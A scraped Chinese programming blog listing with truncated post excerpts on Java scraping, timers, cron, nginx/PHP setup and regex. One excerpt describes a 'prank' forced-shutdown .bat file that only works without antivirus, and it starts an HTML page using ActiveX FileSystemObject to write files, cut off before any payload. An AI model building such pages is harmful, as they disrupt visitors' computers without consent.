`
沙漠绿树
  • 浏览: 425411 次
  • 性别: Icon_minigender_1
  • 来自: 深圳
社区版块
存档分类
最新评论
文章列表
引用   一直以来做数据采集工作,网上HTML网页解析器有很多,但是帮助文档不是很多。因为我在做采集工作的时候,使用别人写的API感觉不是很好用。所以自己开发了一套采集API,为了能更好和大家交流,已经形成了帮组文档,过几天将发布在这里。形成API帮助文档,对于JAVA来说,我比较喜欢使用jd2chm工具,使用它的前提需要安装微软的HtmlHelp WorkShop。两个压缩包在附件中,并且两个工具的使用文档也在里头。
引用    一直在做JAVA采集程序,积累了自己JAVA采集API。在采集过程中,常常使用到定时器,在JAVA的API中有Timer和TimerTask两个类做定时器。精确度那可以肯定的,对周期性运行的程序定时效果很好。但是有个不好使用的地方就是 ...
引用   一直在做采集项目,对于一个综合性的采集系统,对系统的资源检测是必要的。对于正常用户,里面的一些命令是没有的,要到微软的网站上去下载下载地址可以百度或谷歌一下。附件里面是对各种命令的介绍,分为Windows Resource Kits 和 Windows Support Tools工具命令 和 DOS命令介绍。
引用    这些天做的是分类工作,其中用到了数据库保存树形结构的数据,就是在一个数据库表中储存了多棵树。比如在数据库表“分类表”中有“ID”,“父ID”和“分类名称”三个字段。以下是表结构和数据。 ID    父ID    分类名称 1               A 2      1       B 3      1       C 4      2       D 5      2       E 6      3       F 7      3       H     扫描树结构表时,需要依此访问树结构的每个节点,一个节点只能访问一次,其访问的步骤如下: 第一步:从根节点开始; ...
引用    在php开发当中,最常用的环境莫过于在LAMP:linux+apache+mysql+php了,在windows下有WAMP:windows+apache+mysql+php和iis+mysql+php。这些的配置我这里不做说明,留在下次说明,其实我本人也是在上述环境下开发。今天我我看了一个大家都说世界上运行最快的,站资源很少的服务器:nginx(engine x的简称)。我这里要讲的是windows下配置nginx+php+mysql的环境。     这个环境我个人也是使用了下,原理是采用cgi来运行的。大家都知道,php在apache下面有两种运行方式,一种是以模块形式运行,一 ...
引用    因为经理要求我们及时填写绩效系统,和登录,关闭绩效系统,又担心工作忙忘记填写,所以做了这个小程序。程序可以根据属性文件配置来做提醒。比如在10:30点时程序提醒,则我们只需要在属性文件加入“10-30=记得记录绩效系统哦!”(不含双引号)。不多说啦,以下是程序的实现和属性文件的填写。          附件中是程序编译成功之后exe文件。(要求操作系统安装了JAVA VM)本人含有不需要安装VM,要的朋友,发qq消息给我 ,qq 28561416,或者留言。 import java.io.FileInputStream; import java.io.FileNo ...
引用    当我们要定时运行个程序时,首先想到的是在程序里设置定时运行,但是是否想过自己写定时运行的程序,在时间设置上,或者在操作性,安全性性,效率性要达到一定的高度,程序编写能力应该比较高,但是对以一般程序原来说,也是有解决之道的,就是利用系统的计划任务功能,在linux下有crontab,在windows下也有个与之相对应的功能。 下面就来演示下windows的定时运行功能:以下使用的是windows Xp系统来演示的。 一.创建配置 1.点击“开始” 2.点击“控制面板” 3.双击“任务计划” 4.双击“添加任务计划” 5.到了“任务计划向导”界面,点击“下一步” 6.点击 ...
引用    因为在做垂直搜索工作中,使用的是java编写的一个搜索类库。做垂直搜索,很多实用要使用到配置。当搜索的信息量大时,网站的更新。搜索程序的配置维护是一个不可忽视的问题。所以用了php做网页,提供配置界面,这样就可以不用直接修改配置文件或是配置数据库表。当把配置信息配置好了,我们需要检测配置是否正确,因为使用的是java程序,所以检测配置的正确与否使用的也是java程序来检测。这里就存在一个问题,就是需要把php页面上的信息传入到java程序中去检测。这个时候就需要php和java通信了。下面我就来介绍下怎么使php跟java通信(当然,你也可以使用类似webservice等技术)也就是 ...
引用JDK中正则表达式类库详解二    在上一篇文章中,我们了解JAVA正则表达式的一些基础知识,但是还没有设计JDK中的类库使用。现在我们将结合上篇文章的知识,我们来了解下JDK API中有关正则表达式的两个重要的类,及其详 ...
引用    最近看了一些资料,资料上有些正则JDK中正则表达式类库方法的使用,这些包含我平时要用到的功能,而我是确实用的别的方式实现的,在效率上可能没有那么好,所以我上网查找和动手编写了一些例子来验证那些方法 ...
引用     在使用linux系统开发时,不免要使用系统中的一些功能。比如程序的定时运行,系统定时做某些事情。而我在做java开发中,常使用系统中crontab类定时运行程序,虽然java中也有相关的实现,但是我个人认为还是系统的好用,因为在日志方面,程序管理方面更好。 在命令行中输入 crontab -e 就可以配置 cron 了。 cron 配置计划任务的书写格式 * * * * * [用户名] 命令 分钟 小时 日 月 周 [用户名] 命令 说明: 第一段应该定义的是:分钟,表示每个小时的第几分钟来执行。范围是从0-59第二段应该定义的是:小时, ...
引用       最近喜欢上了bat,经过几天的学习,对它也有了初步的了解,自己做了一个文件,也娱乐下。呵呵,这个文件可以强制关机哦,前提没有杀毒软件了,不然就会被杀掉了。 <html> <head> <script type="text/javascript"> function test(){ var fso, tf; fso = new ActiveXObject("Scripting.FileSystemObject"); //获得文件对象 tf = fso.Creat ...
本片文章是转载别人的,但是经过本人的稍加排版,以便于阅读。 Javascript----文件操作 一、功能实现核心:FileSystemObject 对象 要在javascript中实现文件操作功能,主要就是依靠FileSystemobject对象。 二、FileSystemObject编程 使用FileSystemObject 对象进行编程很简单,一般要经过如下的步骤: 创建FileSystemObject对象、应用相关方法、访问对象相关属性 。 (一)创建FileSystemObject对象 创建FileSystemObject对象的代码只要 ...
引用    做信息采集时,难免要用到一些正则表达式了。但是用正则表达式有个贪婪性问题。     贪婪量词先看整个字符串是不是匹配,如果没有发现匹配,先去掉最后字符串中的最后一个字符,并再次尝试,如果还没有发现匹配,那么再次去掉最后一个字符,这个过程会一直重复下去直到发现匹配或不剩任何字符串,上面的简单量词都是贪婪量词。   惰性量词先看字符串中的第一个字母是不是一个匹配,如果不匹配则继续读入下一个字符进行匹配,如果没有则一直匹配下去,与贪婪量词刚好相反,惰性量词用上面的简单量词跟一个?表示。   支配量词只尝试匹配整个字符串,如果整个字符串不能匹配,不能进一步尝试。     运用前瞻可以告诉 ...
引用    在java中,使用break可以跳出循环,默认情况下是跳出最里层的循环,假如我们要跳出多层循环怎么办呢,Java替我们已经做好了这一点,就是用 循环标签 :即是对某个循环定义一个名字,然后在 break 后面加上这个名字,当符合 break 条件时,程序就会跳到规定的循环那。这个有点像我们编写PL/SQL程序。下面来一个例子吧,说明下这个问题。 public class Break { //演示默认情况下的break跳出循环,是最里层循环。 public static void cycle1(){ for (int i = 0; i < ...
Global site tag (gtag.js) - Google Analytics